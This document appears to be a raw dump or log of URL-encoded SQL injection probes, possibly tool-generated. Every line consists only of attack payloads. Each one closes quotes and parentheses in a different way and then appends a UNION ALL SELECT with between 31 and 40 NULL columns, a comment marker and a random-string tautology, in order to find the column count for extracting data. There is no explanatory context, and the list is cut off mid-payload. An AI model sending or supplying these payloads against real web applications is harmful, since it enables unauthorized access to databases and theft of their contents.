1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27twTs%27%20LIKE%20%27twTs 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27OWuD%27%20LIKE%20%27OWuD 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27uOrU%27%20LIKE%20%27uOrU 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27OIMV%27%20LIKE%20%27OIMV 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27AjGz%27%20LIKE%20%27AjGz 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27lUVM%27%20LIKE%20%27lUVM 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27MYGm%27%20LIKE%20%27MYGm 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27moWk%27%20LIKE%20%27moWk 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27qwAa%27%20LIKE%20%27qwAa 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27yrtF%27%20LIKE%20%27yrtF 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27NVna%27%20LIKE%20%27NVna 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27vkDz%27%20LIKE%20%27vkDz 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27qLpP%27%20LIKE%20%27qLpP 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27hpwf%27%20LIKE%20%27hpwf 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27yEbE%27%20LIKE%20%27yEbE 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27RccY%27%20LIKE%20%27RccY 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27QvTn%27%20LIKE%20%27QvTn 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27DRXa%27%20LIKE%20%27DRXa 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27TCfv%27%20LIKE%20%27TCfv 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27zBVR%27%20LIKE%20%27zBVR 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27xQzY%27%20LIKE%20%27xQzY 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27xKFq%27%20LIKE%20%27xKFq 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27DCzo%27%20LIKE%20%27DCzo 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22BghS%22%3D%22BghS 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22efQw%22%3D%22efQw 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22fqle%22%3D%22fqle 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22xhVg%22%3D%22xhVg 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22VhdO%22%3D%22VhdO 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22yRZn%22%3D%22yRZn 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22IPYr%22%3D%22IPYr 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22WJqJ%22%3D%22WJqJ 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22tpvf%22%3D%22tpvf 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22yjAI%22%3D%22yjAI 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22TIOu%22%3D%22TIOu 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22tpIu%22%3D%22tpIu 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22BIdC%22%3D%22BIdC 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22OZBD%22%3D%22OZBD 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22TcjA%22%3D%22TcjA 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22Hfqz%22%3D%22Hfqz 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22hkPC%22%3D%22hkPC 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22WBXg%22%3D%22WBXg 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22mMBg%22%3D%22mMBg 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22RhVC%22%3D%22RhVC 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22IEzC%22%3D%22IEzC 